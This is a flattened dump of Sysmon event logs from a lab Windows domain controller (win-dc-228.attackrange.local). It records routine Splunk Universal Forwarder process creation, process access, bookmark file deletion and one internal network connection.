Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202567Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.866{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC67152F3AEE9033C5BA2506AC61B9A,SHA256=0D7BC7668D4E4FF0427DF199ACF7957DB30E6716A84C738598A8BEFFF3AEE8CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202566Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8E2-6040-2A4E-00000000AD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202565Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202564Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202563Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202562Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202561Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8E2-6040-2A4E-00000000AD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202560Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.772{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8E2-6040-2A4E-00000000AD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202559Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.773{5ABCFE62-E8E2-6040-2A4E-00000000AD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202558Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8E2-6040-294E-00000000AD01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202557Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202556Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202555Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202554Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202553Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E8E2-6040-294E-00000000AD01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202552Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.100{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8E2-6040-294E-00000000AD01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202551Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.101{5ABCFE62-E8E2-6040-294E-00000000AD01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202580Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.871{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9673189BBF34613ACA7725071F354002,SHA256=E86629D30AD3B88F8188B7C5305899C4C8D60AE9B22DE879AF8A632103FE9096,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202579Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.569{5ABCFE62-E8E3-6040-2B4E-00000000AD01}54684400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202578Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8E3-6040-2B4E-00000000AD01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202577Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202576Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202575Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202574Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202573Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8E3-6040-2B4E-00000000AD01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202572Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.444{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8E3-6040-2B4E-00000000AD01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202571Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.445{5ABCFE62-E8E3-6040-2B4E-00000000AD01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002202570Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:14.935{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60648-false10.0.1.12-8000- 23542300x80000000000000002202569Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.147{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AB8AFE86FF2A763B128B903FCC88429,SHA256=880C62E157CD531E7FB3109C357D68611665478BFB598870E41936EF63C53785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202582Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:20.879{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=533C009F78F8C5027A5DA2133DD1F0B2,SHA256=19D02016DA3E31D7E0C79790245343567477A9106F0D4D3331CB4340F26710D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202581Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:20.613{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F99E831D9E994C2663B3F5DD70ADA5C,SHA256=4CDC4B98DEAA73CF703352DC00CAD68ADF2D39DF9BDF4A9F70E2385A74EA73F6,IMPHASH=00000000000000000000000000000000falsetrue 